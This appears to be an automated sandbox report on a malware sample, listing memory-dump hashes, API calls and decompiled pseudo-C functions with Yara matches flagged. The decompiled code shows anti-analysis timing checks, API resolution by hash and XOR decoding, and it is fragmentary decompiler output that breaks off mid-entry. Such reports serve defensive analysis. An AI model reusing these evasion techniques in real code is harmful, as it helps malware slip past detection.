                                                                        • Opcode Fuzzy Hash: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                                                        • Instruction Fuzzy Hash: 5E90027120101413D21161694504747040997D0381F91C822A0414558D96968992F1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                        • Instruction ID: 7f377594fd477e745db0d2365666abab7a85ba38085e1d36b8c60e47a0b3168f
                                                                        • Opcode Fuzzy Hash: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                                                        • Instruction Fuzzy Hash: A3900261242051525645B16944045474406A7E0381791C422A1404950C85669896E6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                        • Instruction ID: 642dd0def788fb938de69273999da7cd801649df2f03b5e1a960fec64ae0fb7f
                                                                        • Opcode Fuzzy Hash: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                                                        • Instruction Fuzzy Hash: D49002A134101442D20061694414B460405D7E1341F51C425E1054554D8659CC92B1A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                        • Instruction ID: c7954daf700f4338adbdfeed6f0069a43556669194b8081608872ad512236bd5
                                                                        • Opcode Fuzzy Hash: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                                                        • Instruction Fuzzy Hash: 099002B120101402D24071694404786040597D0341F51C421A5054554E86998DD5B6E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                        • Instruction ID: 3b687e96f199dd21cb378e9f49fe73b3375dc4ba105fcb134f0ba31fb03a36e3
                                                                        • Opcode Fuzzy Hash: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                                                        • Instruction Fuzzy Hash: 01900261601010424240717988449464405BBE1351751C531A0988550D859988A5A6E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                        • Instruction ID: 8df89223d9018c177ff8f1eb54fca35c11d7028d3a219ead17575dfc413adddf
                                                                        • Opcode Fuzzy Hash: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                                                        • Instruction Fuzzy Hash: D690027120141402D2006169481474B040597D0342F51C421A1154555D86658891B5F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                        • Instruction ID: 1bf617c2e1ee59fc22ddbed6eb5cdbdb23f82eb87c14a0d42622089325ef8903
                                                                        • Opcode Fuzzy Hash: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                                                        • Instruction Fuzzy Hash: 2490026121181042D30065794C14B47040597D0343F51C525A0144554CC95588A1A5A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                        • Instruction ID: c89522a2b032d0d00dff26a7a0b15994b5a58150f72595e5f04cdba066ffebc9
                                                                        • Opcode Fuzzy Hash: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                                                        • Instruction Fuzzy Hash: C79002A120201003420571694414656440A97E0341B51C431E1004590DC56588D1B1A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                        • Instruction ID: 6f023eacc869ff7f25b3af23d12435b2af70af3398e7feea62e8707887d18864
                                                                        • Opcode Fuzzy Hash: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                                                        • Instruction Fuzzy Hash: 6E900265211010030205A5690704547044697D5391351C431F1005550CD66188A1A1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                        • Instruction ID: 8205e1a92dd3e72244153608506a96a365a32d10630a253063b883e78df6617f
                                                                        • Opcode Fuzzy Hash: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                                                        • Instruction Fuzzy Hash: 7690027120109802D2106169840478A040597D0341F55C821A4414658D86D588D1B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                        • Instruction ID: 58efcbd6f734c61d2ad59f03bbfe76f3c83c9e217c82a060905bc2ba634e7742
                                                                        • Opcode Fuzzy Hash: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                                                        • Instruction Fuzzy Hash: 6D90027120101802D2807169440468A040597D1341F91C425A0015654DCA558A99B7E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                        • Instruction ID: bc39d063fef2f08a8de5a0600114798c88d7b666a9122f203a008fdcbf199305
                                                                        • Opcode Fuzzy Hash: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                                                        • Instruction Fuzzy Hash: 8890026130101003D240716954186464405E7E1341F51D421E0404554CD9558896A2A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                        • Instruction ID: 7a9f111b437a2ce17f5b8e5668e2a5b3ba7da211e4f3bfefa99e87cadca76612
                                                                        • Opcode Fuzzy Hash: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                                                        • Instruction Fuzzy Hash: 1A90026921301002D2807169540864A040597D1342F91D825A0005558CC95588A9A3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                        • Instruction ID: 081c01b96c3e170aec37ee04d371d35005f4d4e547f399acb0f3bdc49266b50b
                                                                        • Opcode Fuzzy Hash: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                        • Instruction Fuzzy Hash: D890027131115402D21061698404746040597D1341F51C821A0814558D86D588D1B1A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                        • Instruction ID: 64f1f5af06b8ba630cc63a7c6f296be1647b0df368996297f46b3b2ce2f2b3b1
                                                                        • Opcode Fuzzy Hash: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                                                        • Instruction Fuzzy Hash: 1A90027120101402D20065A95408686040597E0341F51D421A5014555EC6A588D1B1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004088A0(intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				char _v284;
                                                                        				char _v804;
                                                                        				char _v840;
                                                                        				void* _t24;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t39;
                                                                        				void* _t50;
                                                                        				intOrPtr _t52;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				void* _t55;
                                                                        				void* _t56;
                                                                        
                                                                        				_t52 = _a4;
                                                                        				_t39 = 0; // executed
                                                                        				_t24 = E00406E00(_t52,  &_v24); // executed
                                                                        				_t54 = _t53 + 8;
                                                                        				if(_t24 != 0) {
                                                                        					E00407010( &_v24,  &_v840);
                                                                        					_t55 = _t54 + 8;
                                                                        					do {
                                                                        						E00419CC0( &_v284, 0x104);
                                                                        						E0041A330( &_v284,  &_v804);
                                                                        						_t56 = _t55 + 0x10;
                                                                        						_t50 = 0x4f;
                                                                        						while(1) {
                                                                        							_t31 = E00413DC0(E00413D60(_t52, _t50),  &_v284);
                                                                        							_t56 = _t56 + 0x10;
                                                                        							if(_t31 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t50 = _t50 + 1;
                                                                        							if(_t50 <= 0x62) {
                                                                        								continue;
                                                                        							} else {
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        						_t9 = _t52 + 0x14; // 0xffffe1b5
                                                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                        						_t39 = 1;
                                                                        						L8:
                                                                        						_t33 = E00407040( &_v24,  &_v840);
                                                                        						_t55 = _t56 + 8;
                                                                        					} while (_t33 != 0 && _t39 == 0);
                                                                        					_t34 = E004070C0(_t52,  &_v24); // executed
                                                                        					if(_t39 == 0) {
                                                                        						asm("rdtsc");
                                                                        						asm("rdtsc");
                                                                        						_v8 = _t34 - 0 + _t34;
                                                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                        					return 1;
                                                                        				} else {
                                                                        					return _t24;
                                                                        				}
                                                                        			}
                                                                        Instruction addresses (decompiler annotation, one per listed line, in order): 0x004088ab, 0x004088b3, 0x004088b5, 0x004088ba, 0x004088bf, 0x004088d2, 0x004088d7, 0x004088e0, 0x004088ec, 0x004088ff, 0x00408904, 0x00408907, 0x00408910, 0x00408922, 0x00408927, 0x0040892c, 0x00000000, 0x00000000, 0x0040892e, 0x00408932, 0x00000000, 0x00000000, 0x00408934, 0x00000000, 0x00408932, 0x00408936, 0x00408939, 0x0040893f, 0x00408941, 0x0040894c, 0x00408951, 0x00408954, 0x00408961, 0x0040896c, 0x0040896e, 0x00408974, 0x00408978, 0x0040897b, 0x0040897b, 0x00408982, 0x00408985, 0x0040898a, 0x00408997, 0x004088c6, 0x004088c6, 0x004088c6

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                        • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                        • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E004184B2(void* __eax, void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                        				void* _t34;
                                                                        
                                                                        				asm("int3");
                                                                        				asm("loope 0x38");
                                                                        				_t3 = __esi - 0x62;
                                                                        				 *_t3 =  *((intOrPtr*)(__esi - 0x62)) - _t34;
                                                                        				if ( *_t3 != 0) goto L3;
                                                                        			}
                                                                        Disassembly addresses (instruction text not recovered): 0x004184b8, 0x004184b9, 0x004184bb, 0x004184bb, 0x004184bf

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitFreeHeapProcess
                                                                        • String ID:
                                                                        • API String ID: 1180424539-0
                                                                        • Opcode ID: bedcce826d9413d64ce37c51eb5aefb854cd43b9e841e933c38bde8686d6bb52
                                                                        • Instruction ID: c5812b134601cec6ed4ce3c89a67d10858ddf80978952279d4a92857d737ad01
                                                                        • Opcode Fuzzy Hash: bedcce826d9413d64ce37c51eb5aefb854cd43b9e841e933c38bde8686d6bb52
                                                                        • Instruction Fuzzy Hash: 69F06D70200204ABDB24EF69DC45EE77768EF85314F01854EF9499B342DA34EA55CAF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                        				char _v67;
                                                                        				char _v68;
                                                                        				void* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				int _t14;
                                                                        				long _t21;
                                                                        				intOrPtr* _t25;
                                                                        				void* _t26;
                                                                        				void* _t30;
                                                                        
                                                                        				_t30 = __eflags;
                                                                        				_v68 = 0;
                                                                        				E00419D10( &_v67, 0, 0x3f);
                                                                        				E0041A8F0( &_v68, 3);
                                                                        				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                        				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                        				_t25 = _t13;
                                                                        				if(_t25 != 0) {
                                                                        					_t21 = _a8;
                                                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                        					_t32 = _t14;
                                                                        					if(_t14 == 0) {
                                                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                        					}
                                                                        					return _t14;
                                                                        				}
                                                                        				return _t13;
                                                                        			}
                                                                        Disassembly addresses (instruction text not recovered): 0x00407260, 0x0040726f, 0x00407273, 0x0040727e, 0x0040728e, 0x0040729e, 0x004072a3, 0x004072aa, 0x004072ad, 0x004072ba, 0x004072bc, 0x004072be, 0x004072db, 0x004072db, 0x00000000, 0x004072dd, 0x004072e2

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                        • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                        • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction ID: e786dc0bd8427be7affffb0d36256a0335f692e93034ad8e648979a5604a716e
                                                                        • Opcode Fuzzy Hash: 6c15e8501506c95730847b73d40eaf1172a68cf1da89939c31c884e119419ecc
                                                                        • Instruction Fuzzy Hash: 52F0C2B26042106FCB10DF98D885DEB77A9EF85320B04849AF90C9B212D531EA10CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E00418611(void* __eax, void* __ebx, intOrPtr _a4, WCHAR* _a12, void* _a16) {
                                                                        				signed int _v11;
                                                                        				WCHAR* _t10;
                                                                        				int _t11;
                                                                        				WCHAR* _t14;
                                                                        				void* _t19;
                                                                        				signed int _t27;
                                                                        
                                                                        				asm("xlatb");
                                                                        				_t27 = _v11 * 0x55;
                                                                        				_t9 = _a4;
                                                                        				_t14 =  *(_a4 + 0xa18);
                                                                        				_t10 = E00418DB0(_t19, _a4, _t9 + 0xc8c, _t14, 0, 0x46);
                                                                        				if(_t27 < 0) {
                                                                        					 *_t10 = _t10 +  *_t10;
                                                                        					_t10 = _a12;
                                                                        				}
                                                                        				asm("adc [ebx-0x3b7cf3b3], cl");
                                                                        				asm("adc al, 0x52");
                                                                        				_t11 = LookupPrivilegeValueW(_t14, _t10, ??); // executed
                                                                        				return _t11;
                                                                        			}
                                                                        Disassembly addresses (instruction text not recovered): 0x00418618, 0x0041861d, 0x00418623, 0x00418626, 0x0041863a, 0x0041863b, 0x0041863d, 0x00418642, 0x00418642, 0x00418644, 0x0041864a, 0x00418650, 0x00418654

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: daea61a1fc8f0185a56a6f1fd9c3db7f782f31fe3f6a131274be864722587fd1
                                                                        • Instruction ID: 6ab814c6eccd1fa940f1adbdb9261c27b9ba15d32305f8d74d47cb96cdcb8471
                                                                        • Opcode Fuzzy Hash: daea61a1fc8f0185a56a6f1fd9c3db7f782f31fe3f6a131274be864722587fd1
                                                                        • Instruction Fuzzy Hash: 7AE06DB16002086FDB10DF59CC81EDB77AAEF89750F018159FE1DAB281C930E9418BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                        				void* _t10;
                                                                        				void* _t15;
                                                                        
                                                                        				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                        				return _t10;
                                                                        			}
                                                                        Disassembly addresses (instruction text not recovered): 0x00418497, 0x004184ad, 0x004184b1

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E00418620(void* __eflags, intOrPtr _a4, WCHAR* _a12, void* _a16) {
                                                                        				WCHAR* _t7;
                                                                        				int _t8;
                                                                        				WCHAR* _t9;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        
                                                                        				_t14 = __eflags;
                                                                        				_t6 = _a4;
                                                                        				_t9 =  *(_a4 + 0xa18);
                                                                        				_t7 = E00418DB0(_t12, _a4, _t6 + 0xc8c, _t9, 0, 0x46);
                                                                        				if(_t14 < 0) {
                                                                        					 *_t7 = _t7 +  *_t7;
                                                                        					_t7 = _a12;
                                                                        				}
                                                                        				asm("adc [ebx-0x3b7cf3b3], cl");
                                                                        				asm("adc al, 0x52");
                                                                        				_t8 = LookupPrivilegeValueW(_t9, _t7, ??); // executed
                                                                        				return _t8;
                                                                        			}
                                                                        Disassembly addresses (instruction text not recovered): 0x00418620, 0x00418623, 0x00418626, 0x0041863a, 0x0041863b, 0x0041863d, 0x00418642, 0x00418642, 0x00418644, 0x0041864a, 0x00418650, 0x00418654

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 65ed4f4e398b5a501d99ba22b0253975388ea218ff8d7d6300220ec8937b88e2
                                                                        • Instruction ID: 79b95261fd4bca5113d7cb2a01fc223ee9f78c87d455dc60d2b0d5c8d6171ae7
                                                                        • Opcode Fuzzy Hash: 65ed4f4e398b5a501d99ba22b0253975388ea218ff8d7d6300220ec8937b88e2
                                                                        • Instruction Fuzzy Hash: AAE086746003007BC714DF68CC85FC737699F49754F054499BA4C1B242D530A900CAE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                        • Instruction ID: 7f541cce7341b726ca3189041fa932a6336af74422518780cffbe53c04ca977f
